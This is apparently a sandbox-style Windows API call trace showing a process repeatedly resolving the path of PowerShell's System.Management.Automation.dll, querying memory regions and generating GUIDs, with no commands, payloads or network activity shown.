	[0225.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.439] GetLastError () returned 0x0
	[0225.439] VirtualQuery (in: lpAddress=0x10d47c, lpBuffer=0x10e47c, dwLength=0x1c | out: lpBuffer=0x10e47c*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e164, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.440] GetLastError () returned 0x0
	[0225.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.440] GetLastError () returned 0x0
	[0225.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.440] GetLastError () returned 0x0
	[0225.440] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x84026101, Data2=0xff93, Data3=0x4e1e, Data4=([0]=0xa8, [1]=0xd1, [2]=0xac, [3]=0xcd, [4]=0x3d, [5]=0xcd, [6]=0x3d, [7]=0xbd))) returned 0x0
	[0225.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.440] GetLastError () returned 0x0
	[0225.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.440] GetLastError () returned 0x0
	[0225.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.441] GetLastError () returned 0x0
	[0225.441] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x34a724b6, Data2=0x67a8, Data3=0x4136, Data4=([0]=0xbe, [1]=0x9, [2]=0xd4, [3]=0x30, [4]=0x41, [5]=0x77, [6]=0x47, [7]=0x89))) returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc1ed71d3, Data2=0x820a, Data3=0x4ae3, Data4=([0]=0xb0, [1]=0xc3, [2]=0x81, [3]=0xf4, [4]=0x75, [5]=0x6a, [6]=0x26, [7]=0xdf))) returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.442] GetLastError () returned 0x0
	[0225.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd0b500cf, Data2=0x62ad, Data3=0x4e09, Data4=([0]=0xb1, [1]=0x4f, [2]=0xc5, [3]=0xa7, [4]=0x6f, [5]=0x16, [6]=0xf, [7]=0x2e))) returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.443] GetLastError () returned 0x0
	[0225.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.444] GetLastError () returned 0x0
	[0225.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.444] GetLastError () returned 0x0
	[0225.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.444] GetLastError () returned 0x0
	[0225.444] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x7dac2ec7, Data2=0xf7f2, Data3=0x468a, Data4=([0]=0x8e, [1]=0xa4, [2]=0xeb, [3]=0x46, [4]=0x72, [5]=0x70, [6]=0x1d, [7]=0x62))) returned 0x0
	[0225.444] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x626f152f, Data2=0xae35, Data3=0x4d6f, Data4=([0]=0x92, [1]=0x2b, [2]=0x2d, [3]=0x51, [4]=0x32, [5]=0x77, [6]=0x39, [7]=0xf8))) returned 0x0
	[0225.445] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xd32a57b3, Data2=0x2a97, Data3=0x4252, Data4=([0]=0xb0, [1]=0xc8, [2]=0x8a, [3]=0x69, [4]=0x5d, [5]=0x18, [6]=0xcb, [7]=0xc7))) returned 0x0
	[0225.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.445] GetLastError () returned 0x0
	[0225.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.445] GetLastError () returned 0x0
	[0225.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.445] GetLastError () returned 0x0
	[0225.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.445] GetLastError () returned 0x0
	[0225.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.445] GetLastError () returned 0x0
	[0225.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.445] GetLastError () returned 0x0
	[0225.445] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x44ac4e32, Data2=0x84d8, Data3=0x4401, Data4=([0]=0xa9, [1]=0x47, [2]=0x74, [3]=0x57, [4]=0xc2, [5]=0x2d, [6]=0xbf, [7]=0xe3))) returned 0x0
	[0225.446] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.446] GetLastError () returned 0x0
	[0225.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.446] GetLastError () returned 0x0
	[0225.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.446] GetLastError () returned 0x0
	[0225.446] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.446] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.447] GetLastError () returned 0x0
	[0225.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.447] GetLastError () returned 0x0
	[0225.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.447] GetLastError () returned 0x0
	[0225.447] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.447] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.448] GetLastError () returned 0x0
	[0225.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.448] GetLastError () returned 0x0
	[0225.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.448] GetLastError () returned 0x0
	[0225.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.448] GetLastError () returned 0x0
	[0225.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.448] GetLastError () returned 0x0
	[0225.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.448] GetLastError () returned 0x0
	[0225.448] VirtualQuery (in: lpAddress=0x10d2d4, lpBuffer=0x10e2d4, dwLength=0x1c | out: lpBuffer=0x10e2d4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.448] VirtualQuery (in: lpAddress=0x10d310, lpBuffer=0x10e310, dwLength=0x1c | out: lpBuffer=0x10e310*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.546] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xdb3eaf1b, Data2=0x571e, Data3=0x4dc7, Data4=([0]=0x8e, [1]=0x73, [2]=0x52, [3]=0xbe, [4]=0x43, [5]=0x76, [6]=0x9d, [7]=0xfb))) returned 0x0
	[0225.546] VirtualQuery (in: lpAddress=0x10d6a4, lpBuffer=0x10e6a4, dwLength=0x1c | out: lpBuffer=0x10e6a4*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0225.551] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb9066f51, Data2=0x1870, Data3=0x4859, Data4=([0]=0x9d, [1]=0x5b, [2]=0x45, [3]=0x91, [4]=0x28, [5]=0x64, [6]=0x9, [7]=0x19))) returned 0x0
	[0225.554] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x42ef46a0, Data2=0xd9c4, Data3=0x4b85, Data4=([0]=0xb4, [1]=0x24, [2]=0xa2, [3]=0xeb, [4]=0x9b, [5]=0x89, [6]=0x78, [7]=0xf2))) returned 0x0
